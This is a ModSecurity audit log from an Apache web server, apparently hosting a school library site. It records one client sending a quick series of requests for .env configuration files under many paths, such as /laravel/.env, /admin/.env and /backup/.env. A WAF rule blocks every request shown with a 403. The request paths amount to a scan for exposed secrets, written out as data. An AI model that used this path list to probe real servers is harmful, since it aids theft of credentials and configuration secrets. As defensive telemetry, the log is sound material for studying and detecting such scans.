Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3d0dcc0c-Z-- --8e35e814-A-- [14/May/2025:04:46:48 +0700] aCO9yF1ltXwOneQqchOtbAAAABU 103.236.140.4 48940 103.236.140.4 8181 --8e35e814-B-- GET /db/.env HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 146.190.167.107 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.78 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 Cookie: X-Forwarded-For: 146.190.167.107 Accept-Encoding: gzip X-Varnish: 146875075 --8e35e814-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --8e35e814-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747172808080473 658 (- - -) Stopwatch2: 1747172808080473 658; combined=248, p1=216, p2=0, p3=0, p4=0, p5=32, sr=64, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8e35e814-Z-- --2670f07c-A-- [14/May/2025:04:46:48 +0700] aCO9yF1ltXwOneQqchOtbQAAABc 103.236.140.4 48944 103.236.140.4 8181 --2670f07c-B-- GET /login/.env HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 146.190.167.107 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.78 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 Cookie: X-Forwarded-For: 146.190.167.107 Accept-Encoding: gzip X-Varnish: 147274693 --2670f07c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --2670f07c-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747172808278464 722 (- - -) Stopwatch2: 1747172808278464 722; combined=260, p1=217, p2=0, p3=0, p4=0, p5=43, sr=64, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2670f07c-Z-- --81077653-A-- [14/May/2025:04:46:48 +0700] aCO9yF1ltXwOneQqchOtbgAAAAA 103.236.140.4 48948 103.236.140.4 8181 --81077653-B-- GET /api_v1/go/.env HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 146.190.167.107 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.78 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 Cookie: X-Forwarded-For: 146.190.167.107 Accept-Encoding: gzip X-Varnish: 146875078 --81077653-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --81077653-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747172808477039 701 (- - -) Stopwatch2: 1747172808477039 701; combined=281, p1=249, p2=0, p3=0, p4=0, p5=32, sr=86, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --81077653-Z-- --3c9ffe2d-A-- [14/May/2025:04:46:48 +0700] aCO9yF1ltXwOneQqchOtbwAAAAQ 103.236.140.4 48952 103.236.140.4 8181 --3c9ffe2d-B-- GET /api_v1/.env HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 146.190.167.107 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.78 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 Cookie: X-Forwarded-For: 146.190.167.107 Accept-Encoding: gzip X-Varnish: 147274696 --3c9ffe2d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --3c9ffe2d-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747172808674391 725 (- - -) Stopwatch2: 1747172808674391 725; combined=301, p1=265, p2=0, p3=0, p4=0, p5=36, sr=85, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3c9ffe2d-Z-- --f1d13874-A-- [14/May/2025:04:46:48 +0700] aCO9yF1ltXwOneQqchOtcAAAAAI 103.236.140.4 48956 103.236.140.4 8181 --f1d13874-B-- GET /api_v2/.env HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 146.190.167.107 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.78 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 Cookie: X-Forwarded-For: 146.190.167.107 Accept-Encoding: gzip X-Varnish: 146875081 --f1d13874-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --f1d13874-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747172808872787 693 (- - -) Stopwatch2: 1747172808872787 693; combined=253, p1=220, p2=0, p3=0, p4=0, p5=32, sr=67, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f1d13874-Z-- --52294b38-A-- [14/May/2025:04:46:49 +0700] aCO9yTMGvM3GPb0-SyRPKAAAAE8 103.236.140.4 48960 103.236.140.4 8181 --52294b38-B-- GET /api_v2/.env HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 146.190.167.107 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.78 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 Cookie: X-Forwarded-For: 146.190.167.107 Accept-Encoding: gzip X-Varnish: 147274699 --52294b38-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --52294b38-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747172809069532 564 (- - -) Stopwatch2: 1747172809069532 564; combined=191, p1=164, p2=0, p3=0, p4=0, p5=27, sr=47, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --52294b38-Z-- --d2340171-A-- [14/May/2025:04:46:49 +0700] aCO9yV1ltXwOneQqchOtcgAAAAM 103.236.140.4 48964 103.236.140.4 8181 --d2340171-B-- GET /v2/.env HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 146.190.167.107 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.78 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 Cookie: X-Forwarded-For: 146.190.167.107 Accept-Encoding: gzip X-Varnish: 147274702 --d2340171-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --d2340171-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747172809466696 596 (- - -) Stopwatch2: 1747172809466696 596; combined=258, p1=226, p2=0, p3=0, p4=0, p5=32, sr=65, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d2340171-Z-- --678d8d08-A-- [14/May/2025:04:46:49 +0700] aCO9yV1ltXwOneQqchOtdAAAAAo 103.236.140.4 48970 103.236.140.4 8181 --678d8d08-B-- GET /v1/.env HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 146.190.167.107 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.78 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 Cookie: X-Forwarded-For: 146.190.167.107 Accept-Encoding: gzip X-Varnish: 147274705 --678d8d08-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --678d8d08-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747172809865202 766 (- - -) Stopwatch2: 1747172809865202 766; combined=301, p1=270, p2=0, p3=0, p4=0, p5=31, sr=78, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --678d8d08-Z-- --9be7b12d-A-- [14/May/2025:04:46:50 +0700] aCO9yl1ltXwOneQqchOtdQAAAAw 103.236.140.4 48976 103.236.140.4 8181 --9be7b12d-B-- GET /admin/.env HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 146.190.167.107 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.78 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 Cookie: X-Forwarded-For: 146.190.167.107 Accept-Encoding: gzip X-Varnish: 146875090 --9be7b12d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --9be7b12d-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747172810063585 716 (- - -) Stopwatch2: 1747172810063585 716; combined=310, p1=278, p2=0, p3=0, p4=0, p5=32, sr=120, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9be7b12d-Z-- --40afb74a-A-- [14/May/2025:04:46:50 +0700] aCO9yjMGvM3GPb0-SyRPKQAAAFE 103.236.140.4 48980 103.236.140.4 8181 --40afb74a-B-- GET /laravel/.env HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 146.190.167.107 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.78 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 Cookie: X-Forwarded-For: 146.190.167.107 Accept-Encoding: gzip X-Varnish: 147274708 --40afb74a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --40afb74a-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747172810263902 623 (- - -) Stopwatch2: 1747172810263902 623; combined=196, p1=169, p2=0, p3=0, p4=0, p5=26, sr=50, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --40afb74a-Z-- --36f2fb40-A-- [14/May/2025:04:46:50 +0700] aCO9yl1ltXwOneQqchOtdgAAAA4 103.236.140.4 48984 103.236.140.4 8181 --36f2fb40-B-- GET /ci4/.env HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 146.190.167.107 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.78 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 Cookie: X-Forwarded-For: 146.190.167.107 Accept-Encoding: gzip X-Varnish: 146875093 --36f2fb40-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --36f2fb40-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747172810461154 786 (- - -) Stopwatch2: 1747172810461154 786; combined=348, p1=315, p2=0, p3=0, p4=0, p5=33, sr=128, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --36f2fb40-Z-- --52c2b043-A-- [14/May/2025:04:46:50 +0700] aCO9yl1ltXwOneQqchOtdwAAABA 103.236.140.4 48988 103.236.140.4 8181 --52c2b043-B-- GET /backup/.env HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 146.190.167.107 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.78 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 Cookie: X-Forwarded-For: 146.190.167.107 Accept-Encoding: gzip X-Varnish: 147274711 --52c2b043-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --52c2b043-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747172810659474 830 (- - -) Stopwatch2: 1747172810659474 830; combined=289, p1=257, p2=0, p3=0, p4=0, p5=32, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --52c2b043-Z-- --2a36e760-A-- [14/May/2025:04:46:50 +0700] aCO9yjMGvM3GPb0-SyRPKgAAAFM 103.236.140.4 48992 103.236.140.4 8181 --2a36e760-B-- GET /frontend/.env HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 146.190.167.107 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.78 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 Cookie: X-Forwarded-For: 146.190.167.107 Accept-Encoding: gzip X-Varnish: 146875096 --2a36e760-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --2a36e760-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747172810856597 693 (- - -) Stopwatch2: 1747172810856597 693; combined=265, p1=231, p2=0, p3=0, p4=0, p5=33, sr=67, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2a36e760-Z-- --7a10d803-A-- [14/May/2025:04:46:51 +0700] aCO9y11ltXwOneQqchOteAAAABI 103.236.140.4 48996 103.236.140.4 8181 --7a10d803-B-- GET /old/.env HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 146.190.167.107 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.78 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 Cookie: X-Forwarded-For: 146.190.167.107 Accept-Encoding: gzip X-Varnish: 147274714 --7a10d803-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --7a10d803-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747172811055323 680 (- - -) Stopwatch2: 1747172811055323 680; combined=252, p1=219, p2=0, p3=0, p4=0, p5=32, sr=65, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7a10d803-Z-- --1e73c978-A-- [14/May/2025:04:46:51 +0700] aCO9y11ltXwOneQqchOteQAAABQ 103.236.140.4 49000 103.236.140.4 8181 --1e73c978-B-- GET /dev/.env HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 146.190.167.107 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.78 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 Cookie: X-Forwarded-For: 146.190.167.107 Accept-Encoding: gzip X-Varnish: 146875099 --1e73c978-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --1e73c978-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747172811253078 680 (- - -) Stopwatch2: 1747172811253078 680; combined=268, p1=237, p2=0, p3=0, p4=0, p5=31, sr=67, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1e73c978-Z-- --3d43944f-A-- [14/May/2025:04:46:51 +0700] aCO9y11ltXwOneQqchOtegAAABY 103.236.140.4 49004 103.236.140.4 8181 --3d43944f-B-- GET /.env HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 146.190.167.107 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.78 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 Cookie: X-Forwarded-For: 146.190.167.107 Accept-Encoding: gzip X-Varnish: 147274717 --3d43944f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --3d43944f-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747172811450101 695 (- - -) Stopwatch2: 1747172811450101 695; combined=266, p1=234, p2=0, p3=0, p4=0, p5=32, sr=79, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3d43944f-Z-- --751c4c0f-A-- [14/May/2025:04:46:51 +0700] aCO9y8OlTOX2TmGW6__uqgAAANU 103.236.140.4 49008 103.236.140.4 8181 --751c4c0f-B-- GET /public/.env HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 146.190.167.107 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.78 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 Cookie: X-Forwarded-For: 146.190.167.107 Accept-Encoding: gzip X-Varnish: 146875102 --751c4c0f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --751c4c0f-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id 